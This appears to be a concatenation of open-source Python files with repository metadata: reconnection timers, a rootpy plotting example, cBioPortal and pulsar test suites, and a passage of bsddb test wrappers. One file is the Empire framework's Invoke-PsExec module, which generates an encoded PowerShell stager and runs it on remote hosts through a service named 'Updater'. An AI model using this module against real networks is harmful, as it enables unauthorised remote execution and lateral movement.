return LogarithmicReconnectionTimer()
## Metodo factoria que crear una instancia de un temporizador de tiempo constante
def CreateConstantTimer(waiting_time=5):
return ConstantReconnectionTimer(waiting_time=waiting_time)
## Crea una temporizador en funcion del tipo especificado
# @param type Tipo de temporizador "Instant", "Logarithmic"
def CreateTimerFormType(type):
if type == "Instant":
return CreateInstantTimer()
elif type == 'Constant':
return ConstantReconnectionTimer()
else:
return CreateLogarithmicTimer()
## Crea un temporizador a partir de una configuracion
# { type :'Instant' }
# { type :'Constant', time : 10 }
# { type :'Logarithmic' }
def CreateTimerFormConfig(config):
if config['type'] == "Instant":
return CreateInstantTimer()
elif config['type'] == 'Constant':
if not config.get['time'] is None:
return ConstantReconnectionTimer(config['time'])
else:
return ConstantReconnectionTimer()
else:
return CreateLogarithmicTimer()
## Clase base que proporciona la estructura basica de un temporizador de reconexion
class ReconnectionTimer:
## Crea una instancia del temporizador de reconexion
def __init__(self):
pass
## Se espera una vuelta del ciclo antes de continuar
def wait(self):
pass
## Reinicia el temporizador
def reset(self):
pass
## Clase que proporciona un temporizador de reconexion instantaneo,
# no hay tiempo de espera entre un ciclo y el siguiente
class InstantReconnectionTimer(ReconnectionTimer):
## Crea una instancia del temporizador instantaneo
def __init__(self):
ReconnectionTimer.__init__(self)
## Convierte la instancia a string
def __str__(self):
return "Instant Reconnection Timer"
## Define un temporizador de reconexion en el que el tiempo de espera entre un ciclo
# y el siguiente es logaritmico, .
class LogarithmicReconnectionTimer(ReconnectionTimer):
def __init__(self):
ReconnectionTimer.__init__(self)
self.__seed = 1
def wait(self):
waitingTime = ((1 + (1 / self.__seed)) ^ self.__seed) * (1 + math.log10(self.__seed))
if waitingTime < 0:
waitingTime = 0
sleep(waitingTime)
self.__seed += 1
def reset(self):
self.__seed = 1
## Convierte la instancia a string
def __str__(self):
return "Logarithmic Reconnection Timer, seed: %s" % self.__seed
## Define un temporizador de reconexion en el que el tiempo de espera entre un ciclo
# y el siguiente es logaritmico, .
class ConstantReconnectionTimer(ReconnectionTimer):
def __init__(self, waiting_time=5):
ReconnectionTimer.__init__(self)
self.__waiting_time = waiting_time
def wait(self):
sleep(self.__waiting_time)
def reset(self):
pass
## Convierte la instancia a string
def __str__(self):
return "Constant Reconnection Timer, seed: %s" % self.__waiting_time
|
petxo/clitellum
|
clitellum/endpoints/channels/reconnectiontimers.py
|
Python
|
gpl-3.0
| 3,471
| 0.007779
|
#!/usr/bin/env python
"""
=================================================
Draw a Quantile-Quantile Plot and Confidence Band
=================================================
This is an example of drawing a quantile-quantile plot with a confidence level
(CL) band.
"""
print __doc__
import ROOT
from rootpy.interactive import wait
from rootpy.plotting import Hist, Canvas, Legend, set_style
from rootpy.plotting.contrib.quantiles import qqgraph
set_style('ATLAS')
c = Canvas(width=1200, height=600)
c.Divide(2, 1, 1e-3, 1e-3)
rand = ROOT.TRandom3()
h1 = Hist(100, -5, 5, name="h1", title="Histogram 1",
linecolor='red', legendstyle='l')
h2 = Hist(100, -5, 5, name="h2", title="Histogram 2",
linecolor='blue', legendstyle='l')
for ievt in xrange(10000):
h1.Fill(rand.Gaus(0, 0.8))
h2.Fill(rand.Gaus(0, 1))
pad = c.cd(1)
h1.Draw('hist')
h2.Draw('hist same')
leg = Legend([h1, h2], pad=pad, leftmargin=0.5,
topmargin=0.11, rightmargin=0.05,
textsize=20)
leg.Draw()
pad = c.cd(2)
gr = qqgraph(h1, h2)
gr.xaxis.title = h1.title
gr.yaxis.title = h2.title
gr.fillcolor = 17
gr.fillstyle = 'solid'
gr.linecolor = 17
gr.markercolor = 'darkred'
gr.markerstyle = 20
gr.title = "QQ with CL"
gr.Draw("ap")
x_min = gr.GetXaxis().GetXmin()
x_max = gr.GetXaxis().GetXmax()
y_min = gr.GetXaxis().GetXmin()
y_max = gr.GetXaxis().GetXmax()
gr.Draw('a3')
gr.Draw('Xp same')
# a straight line y=x to be a reference
f_dia = ROOT.TF1("f_dia", "x",
h1.GetXaxis().GetXmin(),
h1.GetXaxis().GetXmax())
f_dia.SetLineColor(9)
f_dia.SetLineWidth(2)
f_dia.SetLineStyle(2)
f_dia.Draw("same")
leg = Legend(3, pad=pad, leftmargin=0.45,
topmargin=0.45, rightmargin=0.05,
textsize=20)
leg.AddEntry(gr, "QQ points", "p")
leg.AddEntry(gr, "68% CL band", "f")
leg.AddEntry(f_dia, "Diagonal line", "l")
leg.Draw()
c.Modified()
c.Update()
c.Draw()
wait()
|
qbuat/rootpy
|
examples/stats/plot_quantiles.py
|
Python
|
gpl-3.0
| 1,944
| 0.002058
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-PsExec',
'Author': ['@harmj0y'],
'Description': ('Executes a stager on remote hosts using PsExec type functionality.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/rapid7/metasploit-framework/blob/master/tools/psexec.rb'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Host[s] to execute the stager on, comma separated.',
'Required' : True,
'Value' : ''
},
'ServiceName' : {
'Description' : 'The name of the service to create.',
'Required' : True,
'Value' : 'Updater'
},
'Command' : {
'Description' : 'Custom command to execute on remote hosts.',
'Required' : False,
'Value' : ''
},
'ResultFile' : {
'Description' : 'Name of the file to write the results to on agent machine.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
computerName = self.options['ComputerName']['Value']
serviceName = self.options['ServiceName']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
command = self.options['Command']['Value']
resultFile = self.options['ResultFile']['Value']
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-PsExec.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
if command != "":
# executing a custom command on the remote machine
return ""
# if
else:
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
print helpers.color("[!] Error in launcher generation.")
return ""
else:
stagerCmd = '%COMSPEC% /C start /b C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
script += "Invoke-PsExec -ComputerName %s -ServiceName \"%s\" -Command \"%s\"" % (computerName, serviceName, stagerCmd)
script += "| Out-String | %{$_ + \"`n\"};"
return script
|
thebarbershopper/Empire
|
lib/modules/lateral_movement/invoke_psexec.py
|
Python
|
bsd-3-clause
| 5,198
| 0.012697
|
#!/usr/bin/env python3
'''
Copyright (c) 2016 The Hyve B.V.
This code is licensed under the GNU Affero General Public License (AGPL),
version 3, or (at your option) any later version.
'''
import unittest
import logging
import tempfile
import os
import shutil
import time
import difflib
from importer import validateData
try:
WindowsError
except NameError:
WindowsError = None
# globals:
PORTAL_INFO_DIR = 'test_data/api_json_system_tests'
class ValidateDataSystemTester(unittest.TestCase):
'''Test cases around running the complete validateData script
(such as "does it return the correct exit status?" or "does it generate
the html report when requested?", etc)
'''
def setUp(self):
_resetClassVars()
# Prepare global variables related to sample profiled for mutations and gene panels
self.mutation_sample_ids = None
self.mutation_file_sample_ids = set()
self.fusion_file_sample_ids = set()
def tearDown(self):
"""Close logging handlers after running validator and remove tmpdir."""
# restore original function
validateData.mutation_sample_ids = None
validateData.mutation_file_sample_ids = set()
validateData.fusion_file_sample_ids = set()
# get the logger used in validateData.main_validate()
validator_logger = logging.getLogger(validateData.__name__)
# flush and close all handlers of this logger
for logging_handler in validator_logger.handlers:
logging_handler.close()
# remove the handlers from the logger to reset it
validator_logger.handlers = []
super(ValidateDataSystemTester, self).tearDown()
def assertFileGenerated(self, tmp_file_name, expected_file_name):
"""Assert that a file has been generated with the expected contents."""
self.assertTrue(os.path.exists(tmp_file_name))
with open(tmp_file_name, 'r') as out_file, \
open(expected_file_name, 'r') as ref_file:
base_filename = os.path.basename(tmp_file_name)
diff_result = difflib.context_diff(
ref_file.readlines(),
out_file.readlines(),
fromfile='Expected {}'.format(base_filename),
tofile='Generated {}'.format(base_filename))
diff_line_list = list(diff_result)
self.assertEqual(diff_line_list, [],
msg='\n' + ''.join(diff_line_list))
# remove temp file if all is fine:
try:
os.remove(tmp_file_name)
except WindowsError:
# ignore this Windows specific error...probably happens because of virus scanners scanning the temp file...
pass
def test_exit_status_success(self):
'''study 0 : no errors, expected exit_status = 0.
If there are errors, the script should return
0: 'succeeded',
1: 'failed',
2: 'not performed as problems occurred',
3: 'succeeded with warnings'
'''
# build up the argument list
print("===study 0")
args = ['--study_directory', 'test_data/study_es_0/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
# execute main function with arguments provided as if from sys.argv
args = validateData.interface(args)
exit_status = validateData.main_validate(args)
self.assertEqual(0, exit_status)
def test_exit_status_failure(self):
'''study 1 : errors, expected exit_status = 1.'''
#Build up arguments and run
print("===study 1")
args = ['--study_directory', 'test_data/study_es_1/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
self.assertEqual(1, exit_status)
def test_exit_status_invalid(self):
'''test to fail: give wrong hugo file, or let a meta file point to a non-existing data file, expected exit_status = 2.'''
#Build up arguments and run
print("===study invalid")
args = ['--study_directory', 'test_data/study_es_invalid/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
self.assertEqual(2, exit_status)
def test_exit_status_warnings(self):
'''study 3 : warnings only, expected exit_status = 3.'''
# data_filename: test
#Build up arguments and run
print("===study 3")
args = ['--study_directory', 'test_data/study_es_3/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
self.assertEqual(3, exit_status)
def test_html_output(self):
'''
Test if html file is correctly generated when 'html_table' is given
'''
#Build up arguments and run
out_file_name = 'test_data/study_es_0/result_report.html~'
args = ['--study_directory', 'test_data/study_es_0/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v',
'--html_table', out_file_name]
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
self.assertEqual(0, exit_status)
self.assertFileGenerated(out_file_name,
'test_data/study_es_0/result_report.html')
def test_portal_mismatch(self):
'''Test if validation fails when data contradicts the portal.'''
# build up arguments and run
argv = ['--study_directory', 'test_data/study_portal_mismatch',
'--portal_info_dir', PORTAL_INFO_DIR, '--verbose']
parsed_args = validateData.interface(argv)
exit_status = validateData.main_validate(parsed_args)
# flush logging handlers used in validateData
validator_logger = logging.getLogger(validateData.__name__)
for logging_handler in validator_logger.handlers:
logging_handler.flush()
# expecting only warnings (about the skipped checks), no errors
self.assertEqual(exit_status, 1)
def test_no_portal_checks(self):
'''Test if validation skips portal-specific checks when instructed.'''
# build up arguments and run
argv = ['--study_directory', 'test_data/study_portal_mismatch',
'--verbose',
'--no_portal_checks']
parsed_args = validateData.interface(argv)
exit_status = validateData.main_validate(parsed_args)
# flush logging handlers used in validateData
validator_logger = logging.getLogger(validateData.__name__)
for logging_handler in validator_logger.handlers:
logging_handler.flush()
# expecting only warnings (about the skipped checks), no errors
self.assertEqual(exit_status, 3)
def test_problem_in_clinical(self):
'''Test whether the script aborts if the sample file cannot be parsed.
Further files cannot be validated in this case, as all sample IDs will
be undefined. Validate if the script is giving the proper error.
'''
# build the argument list
out_file_name = 'test_data/study_wr_clin/result_report.html~'
print('==test_problem_in_clinical==')
args = ['--study_directory', 'test_data/study_wr_clin/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v',
'--html_table', out_file_name]
# execute main function with arguments provided as if from sys.argv
args = validateData.interface(args)
exit_status = validateData.main_validate(args)
self.assertEqual(1, exit_status)
# TODO - set logger in main_validate and read out buffer here to assert on nr of errors
self.assertFileGenerated(out_file_name,
'test_data/study_wr_clin/result_report.html')
def test_various_issues(self):
'''Test if output is generated for a mix of errors and warnings.
This includes HTML ouput, the error line file and the exit status.
'''
# build the argument list
html_file_name = 'test_data/study_various_issues/result_report.html~'
error_file_name = 'test_data/study_various_issues/error_file.txt~'
args = ['--study_directory', 'test_data/study_various_issues/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v',
'--html_table', html_file_name,
'--error_file', error_file_name]
args = validateData.interface(args)
# execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
# flush logging handlers used in validateData
validator_logger = logging.getLogger(validateData.__name__)
for logging_handler in validator_logger.handlers:
logging_handler.flush()
# should fail because of various errors in addition to warnings
self.assertEqual(1, exit_status)
# In MAF files (mutation data) there is a column called
# "Matched_Norm_Sample_Barcode". The respective metadata file supports
# giving a list of sample codes against which this column is validated.
# This and other errors are expected in these output files.
self.assertFileGenerated(
html_file_name,
'test_data/study_various_issues/result_report.html')
self.assertFileGenerated(
error_file_name,
'test_data/study_various_issues/error_file.txt')
def test_files_with_quotes(self):
'''
Tests the scenario where data files contain quotes. This should give errors.
'''
#Build up arguments and run
out_file_name = 'test_data/study_quotes/result_report.html~'
print('==test_files_with_quotes==')
args = ['--study_directory', 'test_data/study_quotes/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v',
'--html_table', out_file_name]
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
# should fail because of errors with quotes
self.assertEqual(1, exit_status)
self.assertFileGenerated(out_file_name,
'test_data/study_quotes/result_report.html')
def _resetClassVars():
"""Reset the state of classes that check mulitple files of the same type.
GsvaWiseFileValidator classes check
consistency between multiple data files by collecting information in class variables.
This implementation is not consistent with the unit test environment that simulates
different studies to be loaded. To ensure real-world fucntionality the class variables
should be reset before each unit test that tests multi file consistency."""
for c in [ validateData.GsvaWiseFileValidator ]:
c.prior_validated_sample_ids = None
c.prior_validated_feature_ids = None
c.prior_validated_header = None
if __name__ == '__main__':
unittest.main(buffer=True)
|
mandawilson/cbioportal
|
core/src/test/scripts/system_tests_validate_data.py
|
Python
|
agpl-3.0
| 11,621
| 0.001807
|
'''Tests the RPC "calculator" example.'''
import unittest
import types
from pulsar import send
from pulsar.apps import rpc, http
from pulsar.apps.test import dont_run_with_thread
from .manage import server, Root, Calculator
class TestRpcOnThread(unittest.TestCase):
app_cfg = None
concurrency = 'thread'
# used for both keep-alive and timeout in JsonProxy
# long enough to allow to wait for tasks
rpc_timeout = 500
@classmethod
def setUpClass(cls):
name = 'calc_' + cls.concurrency
s = server(bind='127.0.0.1:0', name=name, concurrency=cls.concurrency)
cls.app_cfg = yield from send('arbiter', 'run', s)
cls.uri = 'http://{0}:{1}'.format(*cls.app_cfg.addresses[0])
cls.p = rpc.JsonProxy(cls.uri, timeout=cls.rpc_timeout)
@classmethod
def tearDownClass(cls):
if cls.app_cfg:
return send('arbiter', 'kill_actor', cls.app_cfg.name)
def setUp(self):
self.assertEqual(self.p.url, self.uri)
self.assertTrue(str(self.p))
proxy = self.p.bla
self.assertEqual(proxy.name, 'bla')
self.assertEqual(proxy.url, self.uri)
self.assertEqual(proxy._client, self.p)
self.assertEqual(str(proxy), 'bla')
def test_wsgi_handler(self):
cfg = self.app_cfg
self.assertTrue(cfg.callable)
wsgi_handler = cfg.callable.setup({})
self.assertEqual(len(wsgi_handler.middleware), 2)
router = wsgi_handler.middleware[1]
self.assertEqual(router.route.path, '/')
root = router.post
self.assertEqual(len(root.subHandlers), 1)
hnd = root.subHandlers['calc']
self.assertFalse(hnd.isroot())
self.assertEqual(hnd.subHandlers, {})
# Pulsar server commands
def test_ping(self):
response = yield from self.p.ping()
self.assertEqual(response, 'pong')
def test_functions_list(self):
result = yield from self.p.functions_list()
self.assertTrue(result)
d = dict(result)
self.assertTrue('ping' in d)
self.assertTrue('echo' in d)
self.assertTrue('functions_list' in d)
self.assertTrue('calc.add' in d)
self.assertTrue('calc.divide' in d)
def test_time_it(self):
'''Ping server 5 times'''
bench = yield from self.p.timeit('ping', 5)
self.assertTrue(len(bench.result), 5)
self.assertTrue(bench.taken)
# Test Object method
def test_check_request(self):
result = yield from self.p.check_request('check_request')
self.assertTrue(result)
def test_add(self):
response = yield from self.p.calc.add(3, 7)
self.assertEqual(response, 10)
def test_subtract(self):
response = yield from self.p.calc.subtract(546, 46)
self.assertEqual(response, 500)
def test_multiply(self):
response = yield from self.p.calc.multiply(3, 9)
self.assertEqual(response, 27)
def test_divide(self):
response = yield from self.p.calc.divide(50, 25)
self.assertEqual(response, 2)
def test_info(self):
response = yield from self.p.server_info()
self.assertTrue('server' in response)
server = response['server']
self.assertTrue('version' in server)
app = response['monitors'][self.app_cfg.name]
if self.concurrency == 'thread':
self.assertFalse(app['workers'])
worker = app
else:
workers = app['workers']
self.assertEqual(len(workers), 1)
worker = workers[0]
name = '%sserver' % self.app_cfg.name
if name in worker:
self._check_tcpserver(worker[name]['server'])
def _check_tcpserver(self, server):
sockets = server['sockets']
if sockets:
self.assertEqual(len(sockets), 1)
sock = sockets[0]
self.assertEqual(sock['address'],
'%s:%s' % self.app_cfg.addresses[0])
def test_invalid_params(self):
return self.async.assertRaises(rpc.InvalidParams, self.p.calc.add,
50, 25, 67)
def test_invalid_params_fromApi(self):
return self.async.assertRaises(rpc.InvalidParams, self.p.calc.divide,
50, 25, 67)
def test_invalid_function(self):
p = self.p
yield from self.async.assertRaises(rpc.NoSuchFunction, p.foo, 'ciao')
yield from self.async.assertRaises(rpc.NoSuchFunction,
p.blabla)
yield from self.async.assertRaises(rpc.NoSuchFunction,
p.blabla.foofoo)
yield from self.async.assertRaises(rpc.NoSuchFunction,
p.blabla.foofoo.sjdcbjcb)
def testInternalError(self):
return self.async.assertRaises(rpc.InternalError, self.p.calc.divide,
'ciao', 'bo')
def testCouldNotserialize(self):
return self.async.assertRaises(rpc.InternalError, self.p.dodgy_method)
def testpaths(self):
'''Fetch a sizable ammount of data'''
response = yield from self.p.calc.randompaths(num_paths=20, size=100,
mu=1, sigma=2)
self.assertTrue(response)
def test_echo(self):
response = yield from self.p.echo('testing echo')
self.assertEqual(response, 'testing echo')
def test_docs(self):
handler = Root({'calc': Calculator})
self.assertEqual(handler.parent, None)
self.assertEqual(handler.root, handler)
self.assertRaises(rpc.NoSuchFunction, handler.get_handler,
'cdscsdcscd')
calc = handler.subHandlers['calc']
self.assertEqual(calc.parent, handler)
self.assertEqual(calc.root, handler)
docs = handler.docs()
self.assertTrue(docs)
response = yield from self.p.documentation()
self.assertEqual(response, docs)
def test_batch_one_call(self):
bp = rpc.JsonBatchProxy(self.uri, timeout=self.rpc_timeout)
call_id1 = bp.ping()
self.assertIsNotNone(call_id1)
self.assertEqual(len(bp), 1)
batch_generator = yield from bp
self.assertIsInstance(batch_generator, types.GeneratorType)
self.assertEqual(len(bp), 0)
for ind, batch_response in enumerate(batch_generator):
self.assertEqual(ind, 0)
self.assertEqual(call_id1, batch_response.id)
self.assertEqual(batch_response.result, 'pong')
self.assertIsNone(batch_response.exception)
def test_batch_few_call(self):
bp = rpc.JsonBatchProxy(self.uri, timeout=self.rpc_timeout)
call_id1 = bp.ping()
self.assertIsNotNone(call_id1)
self.assertEqual(len(bp), 1)
call_id2 = bp.calc.add(1, 1)
self.assertIsNotNone(call_id2)
self.assertEqual(len(bp), 2)
batch_generator = yield from bp
self.assertIsInstance(batch_generator, types.GeneratorType)
self.assertEqual(len(bp), 0)
for ind, batch_response in enumerate(batch_generator):
self.assertIn(ind, (0, 1))
if call_id1 == batch_response.id:
self.assertEqual(batch_response.result, 'pong')
self.assertIsNone(batch_response.exception)
elif call_id2 == batch_response.id:
self.assertEqual(batch_response.result, 2)
self.assertIsNone(batch_response.exception)
def test_batch_error_response_call(self):
bp = rpc.JsonBatchProxy(self.uri, timeout=self.rpc_timeout)
call_id1 = bp.ping('wrong param')
self.assertIsNotNone(call_id1)
self.assertEqual(len(bp), 1)
batch_generator = yield from bp
self.assertIsInstance(batch_generator, types.GeneratorType)
self.assertEqual(len(bp), 0)
for ind, batch_response in enumerate(batch_generator):
self.assertEqual(ind, 0)
self.assertEqual(call_id1, batch_response.id)
self.assertIsInstance(batch_response.exception, rpc.InvalidParams)
self.assertIsNone(batch_response.result)
def test_batch_full_response_call(self):
bp = rpc.JsonBatchProxy(self.uri, timeout=self.rpc_timeout,
full_response=True)
bp.ping()
bp.ping()
bp.ping()
self.assertEqual(len(bp), 3)
response = yield from bp
self.assertIsInstance(response, http.HttpResponse)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(bp), 0)
@dont_run_with_thread
class TestRpcOnProcess(TestRpcOnThread):
concurrency = 'process'
# Synchronous client
def test_sync_ping(self):
sync = rpc.JsonProxy(self.uri, sync=True)
self.assertEqual(sync.ping(), 'pong')
self.assertEqual(sync.ping(), 'pong')
|
nooperpudd/pulsar
|
examples/calculator/tests.py
|
Python
|
bsd-3-clause
| 9,018
| 0.000887
|
"""Run all test cases.
"""
import sys
import os
import unittest
try:
# For Pythons w/distutils pybsddb
import bsddb3 as bsddb
except ImportError:
# For Python 2.3
import bsddb
if sys.version_info[0] >= 3 :
charset = "iso8859-1" # Full 8 bit
class logcursor_py3k(object) :
def __init__(self, env) :
self._logcursor = env.log_cursor()
def __getattr__(self, v) :
return getattr(self._logcursor, v)
def __next__(self) :
v = getattr(self._logcursor, "next")()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
next = __next__
def first(self) :
v = self._logcursor.first()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def last(self) :
v = self._logcursor.last()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def prev(self) :
v = self._logcursor.prev()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def current(self) :
v = self._logcursor.current()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def set(self, lsn) :
v = self._logcursor.set(lsn)
if v is not None :
v = (v[0], v[1].decode(charset))
return v
class cursor_py3k(object) :
def __init__(self, db, *args, **kwargs) :
self._dbcursor = db.cursor(*args, **kwargs)
def __getattr__(self, v) :
return getattr(self._dbcursor, v)
def _fix(self, v) :
if v is None : return None
key, value = v
if isinstance(key, bytes) :
key = key.decode(charset)
return (key, value.decode(charset))
def __next__(self) :
v = getattr(self._dbcursor, "next")()
return self._fix(v)
next = __next__
def previous(self) :
v = self._dbcursor.previous()
return self._fix(v)
def last(self) :
v = self._dbcursor.last()
return self._fix(v)
def set(self, k) :
if isinstance(k, str) :
k = bytes(k, charset)
v = self._dbcursor.set(k)
return self._fix(v)
def set_recno(self, num) :
v = self._dbcursor.set_recno(num)
return self._fix(v)
def set_range(self, k, dlen=-1, doff=-1) :
if isinstance(k, str) :
k = bytes(k, charset)
v = self._dbcursor.set_range(k, dlen=dlen, doff=doff)
return self._fix(v)
def dup(self, flags=0) :
cursor = self._dbcursor.dup(flags)
return dup_cursor_py3k(cursor)
def next_dup(self) :
v = self._dbcursor.next_dup()
return self._fix(v)
def next_nodup(self) :
v = self._dbcursor.next_nodup()
return self._fix(v)
def put(self, key, data, flags=0, dlen=-1, doff=-1) :
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(data, str) :
value = bytes(data, charset)
return self._dbcursor.put(key, data, flags=flags, dlen=dlen,
doff=doff)
def current(self, flags=0, dlen=-1, doff=-1) :
v = self._dbcursor.current(flags=flags, dlen=dlen, doff=doff)
return self._fix(v)
def first(self) :
v = self._dbcursor.first()
return self._fix(v)
def pget(self, key=None, data=None, flags=0) :
# Incorrect because key can be a bare number,
# but enough to pass testsuite
if isinstance(key, int) and (data is None) and (flags == 0) :
flags = key
key = None
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(data, int) and (flags==0) :
flags = data
data = None
if isinstance(data, str) :
data = bytes(data, charset)
v=self._dbcursor.pget(key=key, data=data, flags=flags)
if v is not None :
v1, v2, v3 = v
if isinstance(v1, bytes) :
v1 = v1.decode(charset)
if isinstance(v2, bytes) :
v2 = v2.decode(charset)
v = (v1, v2, v3.decode(charset))
return v
def join_item(self) :
v = self._dbcursor.join_item()
if v is not None :
v = v.decode(charset)
return v
def get(self, *args, **kwargs) :
l = len(args)
if l == 2 :
k, f = args
if isinstance(k, str) :
k = bytes(k, "iso8859-1")
args = (k, f)
elif l == 3 :
k, d, f = args
if isinstance(k, str) :
k = bytes(k, charset)
if isinstance(d, str) :
d = bytes(d, charset)
args =(k, d, f)
v = self._dbcursor.get(*args, **kwargs)
if v is not None :
k, v = v
if isinstance(k, bytes) :
k = k.decode(charset)
v = (k, v.decode(charset))
return v
def get_both(self, key, value) :
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(value, str) :
value = bytes(value, charset)
v=self._dbcursor.get_both(key, value)
return self._fix(v)
class dup_cursor_py3k(cursor_py3k) :
def __init__(self, dbcursor) :
self._dbcursor = dbcursor
class DB_py3k(object) :
def __init__(self, *args, **kwargs) :
args2=[]
for i in args :
if isinstance(i, DBEnv_py3k) :
i = i._dbenv
args2.append(i)
args = tuple(args2)
for k, v in kwargs.items() :
if isinstance(v, DBEnv_py3k) :
kwargs[k] = v._dbenv
self._db = bsddb._db.DB_orig(*args, **kwargs)
def __contains__(self, k) :
if isinstance(k, str) :
k = bytes(k, charset)
return getattr(self._db, "has_key")(k)
def __getitem__(self, k) :
if isinstance(k, str) :
k = bytes(k, charset)
v = self._db[k]
if v is not None :
v = v.decode(charset)
return v
def __setitem__(self, k, v) :
if isinstance(k, str) :
k = bytes(k, charset)
if isinstance(v, str) :
v = bytes(v, charset)
self._db[k] = v
def __delitem__(self, k) :
if isinstance(k, str) :
k = bytes(k, charset)
del self._db[k]
def __getattr__(self, v) :
return getattr(self._db, v)
def __len__(self) :
return len(self._db)
def has_key(self, k, txn=None) :
if isinstance(k, str) :
k = bytes(k, charset)
return self._db.has_key(k, txn=txn)
def set_re_delim(self, c) :
if isinstance(c, str) : # We can use a numeric value byte too
c = bytes(c, charset)
return self._db.set_re_delim(c)
def set_re_pad(self, c) :
if isinstance(c, str) : # We can use a numeric value byte too
c = bytes(c, charset)
return self._db.set_re_pad(c)
def get_re_source(self) :
source = self._db.get_re_source()
return source.decode(charset)
def put(self, key, data, txn=None, flags=0, dlen=-1, doff=-1) :
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(data, str) :
value = bytes(data, charset)
return self._db.put(key, data, flags=flags, txn=txn, dlen=dlen,
doff=doff)
def append(self, value, txn=None) :
if isinstance(value, str) :
value = bytes(value, charset)
return self._db.append(value, txn=txn)
def get_size(self, key) :
if isinstance(key, str) :
key = bytes(key, charset)
return self._db.get_size(key)
def exists(self, key, *args, **kwargs) :
if isinstance(key, str) :
key = bytes(key, charset)
return self._db.exists(key, *args, **kwargs)
def get(self, key, default="MagicCookie", txn=None, flags=0, dlen=-1, doff=-1) :
if isinstance(key, str) :
key = bytes(key, charset)
if default != "MagicCookie" : # Magic for 'test_get_none.py'
v=self._db.get(key, default=default, txn=txn, flags=flags,
dlen=dlen, doff=doff)
else :
v=self._db.get(key, txn=txn, flags=flags,
dlen=dlen, doff=doff)
if (v is not None) and isinstance(v, bytes) :
v = v.decode(charset)
return v
def pget(self, key, txn=None) :
if isinstance(key, str) :
key = bytes(key, charset)
v=self._db.pget(key, txn=txn)
if v is not None :
v1, v2 = v
if isinstance(v1, bytes) :
v1 = v1.decode(charset)
v = (v1, v2.decode(charset))
return v
def get_both(self, key, value, txn=None, flags=0) :
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(value, str) :
value = bytes(value, charset)
v=self._db.get_both(key, value, txn=txn, flags=flags)
if v is not None :
v = v.decode(charset)
return v
def delete(self, key, txn=None) :
if isinstance(key, str) :
key = bytes(key, charset)
return self._db.delete(key, txn=txn)
def keys(self) :
k = self._db.keys()
if len(k) and isinstance(k[0], bytes) :
return [i.decode(charset) for i in self._db.keys()]
else :
return k
def items(self) :
data = self._db.items()
if not len(data) : return data
data2 = []
for k, v in data :
if isinstance(k, bytes) :
k = k.decode(charset)
data2.append((k, v.decode(charset)))
return data2
def associate(self, secondarydb, callback, flags=0, txn=None) :
class associate_callback(object) :
def __init__(self, callback) :
self._callback = callback
def callback(self, key, data) :
if isinstance(key, str) :
key = key.decode(charset)
data = data.decode(charset)
key = self._callback(key, data)
if (key != bsddb._db.DB_DONOTINDEX) :
if isinstance(key, str) :
key = bytes(key, charset)
elif isinstance(key, list) :
key2 = []
for i in key :
if isinstance(i, str) :
i = bytes(i, charset)
key2.append(i)
key = key2
return key
return self._db.associate(secondarydb._db,
associate_callback(callback).callback, flags=flags,
txn=txn)
def cursor(self, txn=None, flags=0) :
